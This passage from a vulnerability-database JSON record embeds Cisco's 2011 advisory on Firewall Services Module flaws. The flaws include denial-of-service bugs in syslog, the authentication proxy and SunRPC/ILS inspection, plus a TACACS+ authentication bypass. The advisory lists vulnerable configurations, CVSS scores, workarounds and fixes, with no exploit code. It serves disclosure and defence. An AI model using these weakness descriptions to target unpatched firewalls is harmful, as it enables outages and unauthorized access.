addresses\n * System logging is enabled (command logging enable)\n * The device is configured in any way to generate system log\n message 302015 (refer to the following examples)\n\nSystem log message 302015 has a default severity level of 6\n(informational) so, assuming that the system administrator has not\nchanged this default severity level, the vulnerability can be\ntriggered if the device is logging to any destination at level 6 or\nlevel 7 (debug). As an example, the following configuration is\nvulnerable:\n\n logging enable\n !\n logging console informational\n logging buffered informational\n [...]\n\nUsing a custom message list (via the logging list command) that\nincludes system log message 302015, either by severity or by\nexplicitly including the message ID, is also a vulnerable\nconfiguration. For example, the following configuration is also\nvulnerable:\n\n logging enable\n !\n logging list MYLIST level informational\n \u003cand/or\u003e\n logging list MYLIST message 302015\n !\n logging trap MYLIST\n\nNote: The default severity level of system log messages can be\nchanged. If the default severity level of system log message 302015\nis changed, and the device is configured to log to any destination at\nthe new severity level, then the device is still vulnerable. \n\nAuthentication Proxy Denial of Service Vulnerability\n+---------------------------------------------------\n\nDevices running vulnerable versions of Cisco FWSM Software are\naffected by this vulnerability if they are configured to use\nAuthentication, Authorization, and Accounting (AAA) for network\naccess, also known as cut-through or authentication proxy. The\nnetwork access authentication feature is enabled if the aaa\nauthentication match or aaa authentication include commands are\npresent in the configuration of an affected device. \n\nTACACS+ Authentication Bypass Vulnerability\n+------------------------------------------\n\nDevices running vulnerable versions of Cisco FWSM Software are\naffected by this vulnerability if they are configured to use the\nTerminal Access Controller Access-Control System Plus (TACACS+)\nprotocol for AAA. A device is configured for TACACS+ if an AAA server\ngroup is defined in a manner similar to the following:\n\n aaa-server my-tacacs-server protocol tacacs+\n aaa-server my-tacacs-server (inside) host 192.168.1.1\n [...]\n\nNote: In the preceding example, \"my-tacacs-server\" is the name of the\nAAA server group. \n\nSunRPC Inspection Denial of Service Vulnerabilities\n+--------------------------------------------------\n\nDevices running vulnerable versions of Cisco FWSM Software are\naffected by these vulnerabilities if SunRPC inspection is enabled. \nSunRPC inspection is enabled by default. \n\nTo determine whether SunRPC inspection is enabled, issue the show\nservice-policy | include sunrpc command and confirm that the command\nreturns output. Example output follows:\n\n FWSM# show service-policy | include sunrpc\n Inspect: sunrpc, packet 324, drop 5, reset-drop 0\n\nAlternatively, a device with SunRPC inspection enabled has a\nconfiguration similar to the following (the inspect sunrpc command is\nthe command that actually enables SunRPC inspection, although the\nother commands are necessary for the Cisco FWSM to actually inspect\ntraffic):\n\n class-map inspection_default\n match default-inspection-traffic\n !\n policy-map global_policy\n class inspection_default\n ... \n inspect sunrpc \n !\n service-policy global_policy global\n\nNote: The service policy could also be applied to a specific\ninterface. (Global application is shown in the previous example.)\n\nILS Inspection Denial of Service Vulnerability\n+---------------------------------------------\n\nDevices running vulnerable versions of Cisco FWSM Software are\naffected by these vulnerabilities if inspection of the ILS protocol\nis enabled. ILS inspection is not enabled by default. \n\nRefer to \"SunRPC Inspection Denial of Service Vulnerabilities\" for\ninformation on how to determine if ILS inspection is enabled. Use the\nconfiguration keyword \"ils\" instead of \"sunrpc\". \n\nThe following example shows a system with a Cisco FWSM (WS-SVC-FWM-1)\ninstalled in slot 2:\n\n switch\u003eshow module\n Mod Ports Card Type Model Serial No. \n --- ----- -------------------------------------- ------------------ -----------\n 1 16 SFM-capable 16 port 1000mb GBIC WS-X6516-GBIC SAL06334NS9\n 2 6 Firewall Module WS-SVC-FWM-1 SAD10360485\n 3 8 Intrusion Detection System WS-SVC-IDSM-2 SAD0932089Z\n 4 4 SLB Application Processor Complex WS-X6066-SLB-APC SAD093004BD\n 5 2 Supervisor Engine 720 (Active) WS-SUP720-3B SAL0934888E\n \n Mod MAC addresses Hw Fw Sw Status\n --- ---------------------------------- ------ ------------ ------------ -------\n 1 0009.11e3.ade8 to 0009.11e3.adf7 5.1 6.3(1) 8.7(0.22)BUB Ok\n 2 0018.ba41.5092 to 0018.ba41.5099 4.0 7.2(1) 4.0(16) Ok\n 3 0014.a90c.9956 to 0014.a90c.995d 5.0 7.2(1) 7.0(4)E4 Ok\n 4 0014.a90c.66e6 to 0014.a90c.66ed 1.7 Unknown Unknown PwrDown\n 5 0013.c42e.7fe0 to 0013.c42e.7fe3 4.4 8.1(3) 12.2(33)SXH8 Ok\n \n [...]\n\nAfter locating the correct slot, issue the show module \u003cslot number\u003e\ncommand to identify the software version that is running, as shown in\nthe following example:\n\n switch\u003eshow module 2\n Mod Ports Card Type Model Serial No. \n --- ----- -------------------------------------- ------------------ -----------\n 2 6 Firewall Module WS-SVC-FWM-1 SAD10360485\n \n Mod MAC addresses Hw Fw Sw Status\n --- ---------------------------------- ------ ------------ ------------ -------\n 2 0018.ba41.5092 to 0018.ba41.5099 4.0 7.2(1) 4.0(16) Ok\n \n [...]\n\nThe preceding example shows that the Cisco FWSM is running software\nversion 4.0(16) as indicated by the Sw column. \n\nNote: Recent versions of Cisco IOS Software will show the software\nversion of each module in the output from the show module command;\ntherefore, executing the show module \u003cslot number\u003e command is not\nnecessary. \n\nIf a Virtual Switching System (VSS) is used to allow two physical\nCisco Catalyst 6500 Series switches to operate as a single logical\nvirtual switch, the show module switch all command can display the\nsoftware version of all FWSMs that belong to switch 1 and switch 2. \nThe output from this command will be similar to the output from show\nmodule \u003cslot number\u003e but will include module information for the\nmodules in each switch in the VSS. The FWSM\noffers firewall services with stateful packet filtering and deep\npacket inspection. \n\nSyslog Message Memory Corruption Denial of Service Vulnerability\n+---------------------------------------------------------------\n\nThe Cisco FWSM has a system log (syslog) feature that provides\ninformation for monitoring normal operation and troubleshooting\nnetwork or device issues. System log messages are assigned different\nseverities (debugging, informational, error, critical, etc.) and can\nbe sent to different logging destinations. \n\nA denial of service vulnerability exists in the implementation of one\nspecific system log message (message ID 302015, \"Built outbound UDP\nconnection session-id for src-intf:IP/Port to dst-intf:IP/Port\nARP-Incomplete\") that can cause memory corruption and lead to a lock\nup or crash of the Cisco FWSM in the event that that system log\nmessage needs to be generated for IPv6 traffic that has flowed\nthrough the device. The Cisco FWSM may not recover on its own and a\nmanual reboot may be necessary to recover. \n\nSystem log message 302015 has a default severity level of 6\n(informational). Changing the default severity level of this system\nmessage will not prevent the issue from occurring if the system is\nlogging to any destinations at the new severity level. The Cisco FWSM\nmust have interfaces with IPv6 addresses otherwise the problem does\nnot occur. \n\nAuthentication Proxy Denial of Service Vulnerability\n+---------------------------------------------------\n\nThe Cisco FWSM authentication proxy feature allows one to use AAA to\ncontrol access to network resources. Specifically, the Cisco FWSM\ncut-through proxy challenges a user initially at the application\nlayer and then authenticates against AAA servers. After the Cisco\nFWSM authenticates the user, it shifts the session flow, and all\ntraffic flows directly between the user\u0027s computer and the network\nresource being accessed. \n\nA denial of service vulnerability exists in some versions of Cisco\nFWSM Software that affects devices configured to use authentication\nto grant users access to the network, also known as cut-through or\nauthentication proxy. Vulnerable configurations are those that\ncontain the aaa authentication match or aaa authentication include\ncommands. The vulnerability may be triggered when there is a high\nnumber of network access authentication requests. \n\nTACACS+ Authentication Bypass Vulnerability\n+------------------------------------------\n\nAAA enables the Cisco FWSM to determine who the user is\n(authentication), what the user can do (authorization), and what the\nuser did (accounting). The Cisco FWSM supports TACACS+ authentication\nfor VPN users, firewall sessions, and administrative access to the\ndevice. \n\nAn authentication bypass vulnerability exists in the TACACS+\nimplementation in the Cisco FWSM. Successful exploitation could allow\na remote attacker to bypass TACACS+ authentication of VPN users (the\nCisco FWSM only allows VPN sessions for management), firewall\nsessions, or administrative access to the device. \n\nSunRPC Inspection Denial of Service Vulnerabilities\n+--------------------------------------------------\n\nThe SunRPC inspection engine enables or disables application\ninspection for the SunRPC protocol. SunRPC is used by Network File\nSystem (NFS) and Network Information Service (NIS). SunRPC services\ncan run on any port. When a client attempts to access a SunRPC\nservice on a server, it must learn the port on which the service is\nrunning. The client does this by querying the port mapper process,\nusually rpcbind, on the well-known port of 111. \n\nThe Cisco FWSM is affected by four vulnerabilities that may cause the\ndevice to reload during the processing of different crafted SunRPC\nmessages when SunRPC inspection is enabled. These vulnerabilities are\ntriggered only by transit traffic; traffic that is destined to the\ndevice does not trigger these vulnerabilities. \n\nILS Inspection Denial of Service Vulnerability\n+---------------------------------------------\n\nThe ILS inspection engine provides Network Address Translation (NAT)\nsupport for Microsoft NetMeeting, SiteServer, and Active Directory\nproducts that use Lightweight Directory Access Protocol (LDAP) to\nexchange directory information with an ILS server. This vulnerability is triggered by transit\ntraffic only; traffic that is destined to the device does not trigger\nthis vulnerability. \n \n\nVulnerability Scoring Details\n+----------------------------\n\nCisco has provided scores for the vulnerabilities in this advisory\nbased on the Common Vulnerability Scoring System (CVSS). The CVSS\nscoring in this Security Advisory is done in accordance with CVSS\nversion 2.0. \n\nCVSS is a standards-based scoring method that conveys vulnerability\nseverity and helps determine urgency and priority of response. \n\nCisco has provided a base and temporal score. Customers can then\ncompute environmental scores to assist in determining the impact of\nthe vulnerability in individual networks. \n\nCisco has provided an FAQ to answer additional questions regarding\nCVSS at:\n\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\n\nCisco has also provided a CVSS calculator to help compute the\nenvironmental impact for individual networks at:\n\nhttp://intellishield.cisco.com/security/alertmanager/cvss\n\n* CSCti83875 -- Syslog message 302015 may lead to memory corruption and CP lockup\n\nCVSS Base Score - 7.8\n Access Vector - Network\n Access Complexity - Low\n Authentication - None\n Confidentiality Impact - None\n Integrity Impact - None\n Availability Impact - Complete\n\nCVSS Temporal Score - 6.4\n Exploitability - Functional\n Remediation Level - Official-Fix\n Report Confidence - Confirmed\n\n\n* CSCtn15697 -- FWSM crash in thread name uauth \n\nCVSS Base Score - 7.8\n Access Vector - Network\n Access Complexity - Low\n Authentication - None\n Confidentiality Impact - None\n Integrity Impact - None\n Availability Impact - Complete\n\nCVSS Temporal Score - 6.4\n Exploitability - Functional\n Remediation Level - Official-Fix\n Report Confidence - Confirmed\n\n\n* CSCto74274 -- Crafted TACACS+ reply considered as successful auth by FWSM\n\nCVSS Base Score - 7.9\n Access Vector - Adjacent Network\n Access Complexity - Medium\n Authentication - None\n Confidentiality Impact - Complete\n Integrity Impact - Complete\n Availability Impact - Complete\n\nCVSS Temporal Score - 6.5\n Exploitability - Functional\n Remediation Level - Official-Fix\n Report Confidence - Confirmed\n\n\n* SunRPC Inspection Denial of Service Vulnerabilities\n\nCVSS Base Score - 7.8\n Access Vector - Network\n Access Complexity - Low\n Authentication - None\n Confidentiality Impact - None\n Integrity Impact - None\n Availability Impact - Complete\n\nCVSS Temporal Score - 6.4\n Exploitability - Functional\n Remediation Level - Official-Fix\n Report Confidence - Confirmed\n\n\n* CSCtq57802 -- ILS inspection crash on malformed ILS traffic\n\nCVSS Base Score - 7.8\n Access Vector - Network\n Access Complexity - Low\n Authentication - None\n Confidentiality Impact - None\n Integrity Impact - None\n Availability Impact - Complete\n\nCVSS Temporal Score - 6.4\n Exploitability - Functional\n Remediation Level - Official-Fix\n Report Confidence - Confirmed\n\n\nImpact\n======\n\nSuccessful exploitation of any of the denial of service\nvulnerabilities could cause an affected device to reload. Repeated\nexploitation could result in a sustained denial of service condition. \n\nSuccessful exploitation of the TACACS+ authentication bypass\nvulnerability could allow an attacker to bypass authentication of\nVPN, firewall, and/or administrative sessions. \n \n\nSoftware Versions and Fixes\n===========================\n\nWhen considering software upgrades, also consult:\nhttp://www.cisco.com/go/psirt and any subsequent advisories to \ndetermine exposure and a complete upgrade solution. \n\nIn all cases, customers should exercise caution to be certain the\ndevices to be upgraded contain sufficient memory and that current\nhardware and software configurations will continue to be supported\nproperly by the new release. If the information is not clear, contact\nthe Cisco Technical Assistance Center (TAC) or your contracted\nmaintenance provider for assistance. \n\nEach row of the following Cisco FWSM Software table describes a major\nCisco FWSM Software train and the earliest possible release in that\ntrain that contains the fix (the \"First Fixed Release\") and the\nanticipated date of availability (if not currently available) in the\nFirst Fixed Release column. A device that is running a release that\nis earlier than the release in a specific column (earlier than the\nFirst Fixed Release) is known to be vulnerable. A vulnerable release\nshould be upgraded to the indicated release at a minimum, or a later\nversion (later than or equal to the First Fixed Release label). These vulnerabilities and their respective\nworkarounds are independent of each other. \n\nSyslog Message Memory Corruption Denial of Service Vulnerability\n+---------------------------------------------------------------\n\nCompletely disabling syslog 302015 with the command no logging\nmessage 302015 is an effective workaround for this vulnerability. \n\nAuthentication Proxy Denial of Service Vulnerability\n+---------------------------------------------------\n\nThere are no workarounds available for this vulnerability. \n\nTACACS+ Authentication Bypass Vulnerability\n+------------------------------------------\n\nThere are no workarounds available for this vulnerability other than\nusing a different authentication protocol such as RADIUS and LDAP. \n\nSunRPC Inspection Denial of Service Vulnerabilities\n+--------------------------------------------------\n\nAdministrators can mitigate these vulnerabilities by disabling SunRPC\ninspection if it is not required. Administrators can disable SunRPC\ninspection by issuing the no inspect sunrpc command in class\nconfiguration sub-mode in the policy map configuration. Disabling\nSunRPC inspection may cause SunRPC traffic to stop transiting the\nsecurity appliance. \n\nILS Inspection Denial of Service Vulnerability\n+---------------------------------------------\n\nAdministrators can mitigate this vulnerability by disabling ILS\ninspection if it is not required. Administrators can disable ILS\ninspection by issuing the no inspect ils command in class\nconfiguration sub-mode in the policy map configuration. Disabling ILS\ninspection may cause ILS traffic to stop through the security\nappliance. \n \n\nObtaining Fixed Software\n========================\n\nCisco has released free software updates that address these\nvulnerabilities. Prior to deploying software, customers should\nconsult their maintenance provider or check the software for feature\nset compatibility and known issues specific to their environment. \n\nCustomers may only install and expect support for the feature sets\nthey have purchased. By installing, downloading, accessing or\notherwise using such software upgrades, customers agree to be bound\nby the terms of Cisco\u0027s software license terms found at:\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html \nor as otherwise set forth at Cisco.com Downloads at:\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml\n\nDo not contact psirt@cisco.com or security-alert@cisco.com for\nsoftware upgrades. \n\n \nCustomers with Service Contracts\n+-------------------------------\n\nCustomers with contracts should obtain upgraded software through\ntheir regular update channels. For most customers, this means that\nupgrades should be obtained through the Software Center on Cisco\u0027s\nworldwide website at http://www.cisco.com\n\n \nCustomers using Third Party Support Organizations\n+------------------------------------------------\n\nCustomers whose Cisco products are provided or maintained through\nprior or existing agreements with third-party support organizations,\nsuch as Cisco Partners, authorized resellers, or service providers\nshould contact that support organization for guidance and assistance\nwith the appropriate course of action in regards to this advisory. \n\nThe effectiveness of any workaround or fix is dependent on specific\ncustomer situations, such as product mix, network topology, traffic\nbehavior, and organizational mission. Due to the variety of affected\nproducts and releases, customers should consult with their service\nprovider or support organization to ensure any applied workaround or\nfix is the most appropriate for use in the intended network before it\nis deployed. \n\n \nCustomers without Service Contracts\n+----------------------------------\n\nCustomers who purchase direct from Cisco but do not hold a Cisco\nservice contract, and customers who purchase through third-party\nvendors but are unsuccessful in obtaining fixed software through\ntheir point of sale should acquire upgrades by contacting the Cisco\nTechnical Assistance Center (TAC). TAC contacts are as follows. \n\n * +1 800 553 2447 (toll free from within North America)\n * +1 408 526 7209 (toll call from anywhere in the world)\n * e-mail: tac@cisco.com\n\nCustomers should have their product serial number available and be\nprepared to give the URL of this notice as evidence of entitlement to\na free upgrade. Free upgrades for non-contract customers must be\nrequested through the TAC. \n\nRefer to \nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html \nfor additional TAC contact information, including localized telephone \nnumbers, and instructions and e-mail addresses for use in various languages. \n \n\nExploitation and Public Announcements\n=====================================\n\nThe Cisco PSIRT is not aware of any public announcements or malicious\nuse of the vulnerabilities described in this advisory. \n\nThe Syslog Message Memory Corruption Denial of Service Vulnerability,\nAuthentication Proxy Denial of Service Vulnerability, and TACACS+\nAuthentication Bypass Vulnerability were discovered during the\ntroubleshooting of customer service requests. \n\nThe SunRPC Inspection Denial of Service Vulnerabilities and ILS\nInspection Denial of Service Vulnerability were discovered by Cisco\nduring internal testing. \n \n\nStatus of this Notice: FINAL\n============================\n\nTHIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY\nKIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\nDOCUMENT AT ANY TIME. \n\nA stand-alone copy or Paraphrase of the text of this document that\nomits the distribution URL in the following section is an\nuncontrolled copy, and may lack important information or contain\nfactual errors. \n \n\nDistribution\n============\n\nThis advisory is posted on Cisco\u0027s worldwide website at:\n\nhttp://www.cisco.com/warp/public/707/cisco-sa-20111005-fwsm.shtml\n\nIn addition to worldwide web posting, a text version of this notice\nis clear-signed with the Cisco PSIRT PGP key and is posted to the\nfollowing e-mail and Usenet news recipients. \n\n * cust-security-announce@cisco.com\n * first-bulletins@lists.first.org\n * bugtraq@securityfocus.com\n * vulnwatch@vulnwatch.org\n * cisco@spot.colorado.edu\n * cisco-nsp@puck.nether.net\n * full-disclosure@lists.grok.org.uk\n * comp.dcom.sys.cisco@newsgate.cisco.com\n\nFuture updates of this advisory, if any, will be placed on Cisco\u0027s\nworldwide website, but may or may not be actively announced on\nmailing lists or newsgroups. Users concerned about this problem are\nencouraged to check the above URL for any updates. \n \n\nRevision History\n================\n\n+---------------------------------------+\n| Revision | | Initial |\n| 1.0 | 2011-October-05 | public |\n| | | release. |\n+---------------------------------------+\n\n \n\nCisco Security Procedures\n=========================\n\nComplete information on reporting security vulnerabilities in Cisco\nproducts, obtaining assistance with security incidents, and\nregistering to receive security information from Cisco, is available\non Cisco\u0027s worldwide website at:\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html\nThis includes instructions for press inquiries regarding Cisco security notices. \nAll Cisco security advisories are available at:\nhttp://www.cisco.com/go/psirt\n\n+--------------------------------------------------------------------\nCopyright 2010-2011 Cisco Systems, Inc. All rights reserved. \n+--------------------------------------------------------------------\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.5 (SunOS)\n\niFcDBQFOjHRIQXnnBKKRMNARCAUrAP9BnUYauwq7OzqUJRuoVjBLn6T2Qh3S/LRn\ne0k/AYOr8AD/T7EQ/K8N+bAPmYBoJxsERyDGg80x/pxfRWFBd1s2+nE=\n=hr9R\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-3303"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "BID",
"id": "49951"
},
{
"db": "VULHUB",
"id": "VHN-51248"
},
{
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"db": "PACKETSTORM",
"id": "105580"
},
{
"db": "PACKETSTORM",
"id": "105583"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-3303",
"trust": 3.7
},
{
"db": "OSVDB",
"id": "76090",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060",
"trust": 0.7
},
{
"db": "BID",
"id": "49947",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-6009",
"trust": 0.6
},
{
"db": "CISCO",
"id": "20111005 MULTIPLE VULNERABILITIES IN CISCO FIREWALL SERVICES MODULE",
"trust": 0.6
},
{
"db": "CISCO",
"id": "20111005 MULTIPLE VULNERABILITIES IN CISCO ASA 5500 SERIES ADAPTIVE SECURITY APPLIANCES AND CISCO CATALYST 6500 SERIES ASA SERVICES MODULE",
"trust": 0.6
},
{
"db": "BID",
"id": "49951",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-51248",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2011-3303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "105580",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "105583",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "VULHUB",
"id": "VHN-51248"
},
{
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"db": "BID",
"id": "49951"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "PACKETSTORM",
"id": "105580"
},
{
"db": "PACKETSTORM",
"id": "105583"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"id": "VAR-201110-0452",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "VULHUB",
"id": "VHN-51248"
}
],
"trust": 1.08282349
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
}
]
},
"last_update_date": "2025-04-11T21:06:34.653000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "sa-20111005-fwsm",
"trust": 0.8,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20111005-fwsm.shtml"
},
{
"title": "sa-20111005-asa",
"trust": 0.8,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20111005-asa.shtml"
},
{
"title": "24244",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24244"
},
{
"title": "1108703_cisco-sa-20111005-fwsm-j",
"trust": 0.8,
"url": "http://www.cisco.com/cisco/web/support/JP/110/1108/1108703_cisco-sa-20111005-fwsm-j.html"
},
{
"title": "1108704_cisco-sa-20111005-asa-j",
"trust": 0.8,
"url": "http://www.cisco.com/cisco/web/support/JP/110/1108/1108704_cisco-sa-20111005-asa-j.html"
},
{
"title": "Patch for Cisco Multiple Device ASA Service Module ILS Communication Resource Management Error Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/37209"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-399",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-51248"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20111005-asa.shtml"
},
{
"trust": 1.9,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20111005-fwsm.shtml"
},
{
"trust": 1.2,
"url": "http://osvdb.org/76090"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/70329"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3303"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-3303"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/49947"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/en/us/products/products_security_advisory09186a0080b97900.shtml"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/en/us/products/products_security_advisory09186a0080b97904.shtml"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3303"
},
{
"trust": 0.2,
"url": "http://www.cisco.com/go/psirt"
},
{
"trust": 0.2,
"url": "http://secunia.com/"
},
{
"trust": 0.2,
"url": "http://www.cisco.com/en/us/support/tsd_cisco_worldwide_contacts.html"
},
{
"trust": 0.2,
"url": "http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3298"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3299"
},
{
"trust": 0.2,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3300"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3301"
},
{
"trust": 0.2,
"url": "http://intellishield.cisco.com/security/alertmanager/cvss"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/399.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=24244"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/en/us/docs/general/warranty/english/eu1ken_.html,"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/en/us/products/products_security_vulnerability_policy.html."
},
{
"trust": 0.1,
"url": "http://www.cisco.com/go/psirt."
},
{
"trust": 0.1,
"url": "http://www.cisco.com."
},
{
"trust": 0.1,
"url": "http://www.cisco.com/public/sw-center/sw-usingswc.shtml."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-3302"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20110831-fwsm.shtml"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20111005-asa.shtml."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3304"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/cisco/software/navigator.html"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/en/us/docs/general/warranty/english/eu1ken_.html"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/public/sw-center/sw-usingswc.shtml"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3296"
},
{
"trust": 0.1,
"url": "http://www.cisco.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3297"
},
{
"trust": 0.1,
"url": "http://www.cisco.com/en/us/products/products_security_vulnerability_policy.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3302"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "VULHUB",
"id": "VHN-51248"
},
{
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"db": "BID",
"id": "49951"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "PACKETSTORM",
"id": "105580"
},
{
"db": "PACKETSTORM",
"id": "105583"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"db": "VULHUB",
"id": "VHN-51248"
},
{
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"db": "BID",
"id": "49951"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"db": "PACKETSTORM",
"id": "105580"
},
{
"db": "PACKETSTORM",
"id": "105583"
},
{
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
"date": "2011-10-06T00:00:00",
"db": "VULHUB",
"id": "VHN-51248"
},
{
"date": "2011-10-06T00:00:00",
"db": "VULMON",
"id": "CVE-2011-3303"
},
{
"date": "2011-10-05T00:00:00",
"db": "BID",
"id": "49951"
},
{
"date": "2011-11-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002741"
},
{
"date": "2011-10-06T00:55:54",
"db": "PACKETSTORM",
"id": "105580"
},
{
"date": "2011-10-06T01:38:59",
"db": "PACKETSTORM",
"id": "105583"
},
{
"date": "2011-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201110-060"
},
{
"date": "2011-10-06T10:55:05.597000",
"db": "NVD",
"id": "CVE-2011-3303"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-6009"
},
{
